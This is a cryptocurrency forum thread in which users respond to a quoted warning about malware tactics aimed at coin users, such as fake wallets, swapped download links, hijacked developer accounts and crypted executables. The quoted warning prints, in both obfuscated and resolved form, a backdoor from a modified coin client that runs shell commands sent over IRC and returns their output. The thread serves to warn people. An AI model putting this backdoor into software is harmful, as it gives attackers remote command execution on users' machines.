Hoxysado
|
|
May 06, 2018, 06:58:59 PM |
|
Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money
|
|
|
|
Tonymillions
Newbie
Offline
Activity: 131
Merit: 0
|
|
May 07, 2018, 08:28:06 AM |
|
OMG
i can;t believe this information. thank you guys. i will pass the message across.
Thanks
|
|
|
|
Miminaha
Member
Offline
Activity: 368
Merit: 10
|
|
May 07, 2018, 09:38:33 PM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus
|
|
|
|
Hoxysado
|
|
May 09, 2018, 07:58:02 PM |
|
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it lets hope that they will work out something soon
|
|
|
|
bitbloq.io
Copper Member
Newbie
Offline
Activity: 33
Merit: 0
|
|
May 09, 2018, 08:00:26 PM |
|
I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
|
|
|
|
Israel712
Newbie
Offline
Activity: 112
Merit: 0
|
|
May 10, 2018, 05:39:29 AM |
|
I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.
|
|
|
|
dangphananh
Newbie
Offline
Activity: 184
Merit: 0
|
|
May 10, 2018, 03:32:39 PM |
|
Bad software scare people the most, I use cash for complete security and I recommend doing so
|
|
|
|
Seram1
Newbie
Offline
Activity: 197
Merit: 0
|
|
May 10, 2018, 07:42:31 PM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus indeed we must always be careful in maintaining our assets. because there are always thieves everywhere. if your assets are gone you can not report where to go because it will be difficult to find him. better prevent before something happens that we do not want.
|
|
|
|
Seram1
Newbie
Offline
Activity: 197
Merit: 0
|
|
May 10, 2018, 08:42:05 PM |
|
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it lets hope that they will work out something soon I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
|
|
|
|
loinguyen1984
Newbie
Offline
Activity: 17
Merit: 0
|
|
May 11, 2018, 03:01:12 AM |
|
I am a new member, please help
|
|
|
|
kalstarzz
|
|
May 11, 2018, 06:07:50 PM |
|
this virus has spread and will hurt many people. if the antivirus is no longer functioning, how we can avoid the virus attack. ?
|
|
|
|
novak hiel
Newbie
Offline
Activity: 77
Merit: 0
|
|
May 13, 2018, 01:21:16 PM |
|
Is there still malware infection attempst? Thank you!!
|
|
|
|
Wiliam heil
Newbie
Offline
Activity: 70
Merit: 0
|
|
May 14, 2018, 09:04:31 AM |
|
I am newbie and thanks for informing. I would like to ask how can we spot a scammer
|
|
|
|
yetiripper
Full Member
Offline
Activity: 250
Merit: 100
The Future Of Work
|
|
May 14, 2018, 12:12:14 PM |
|
This year I am working on getting different wallets and a separate apple so that all the extra programms that I use do not counteract with the system operation itself.
|
|
|
|
edison benzamin
Newbie
Offline
Activity: 52
Merit: 0
|
|
May 15, 2018, 03:47:54 PM |
|
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
|
|
|
|
ProfessorZ
Copper Member
Jr. Member
Offline
Activity: 84
Merit: 1
|
|
May 15, 2018, 11:28:19 PM |
|
I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and burry it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.
|
|
|
|
omareckmac
Member
Offline
Activity: 434
Merit: 15
www.cd3d.app
|
|
May 16, 2018, 05:30:35 AM |
|
Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.
|
|
|
|
Crypto11021
Newbie
Offline
Activity: 107
Merit: 0
|
|
May 16, 2018, 07:56:27 AM |
|
If you can post the coins name it will be better
|
|
|
|
|
Negdan4ik
Member
Offline
Activity: 230
Merit: 10
The Exchange for EOS Community
|
|
May 16, 2018, 04:39:48 PM |
|
I think we should be very careful about the infestations.Thank you very much for the overview and useful information, I Think that this site is very useful for scammers who want easy money. Forewarned is forearmed.
|
|
|
|
|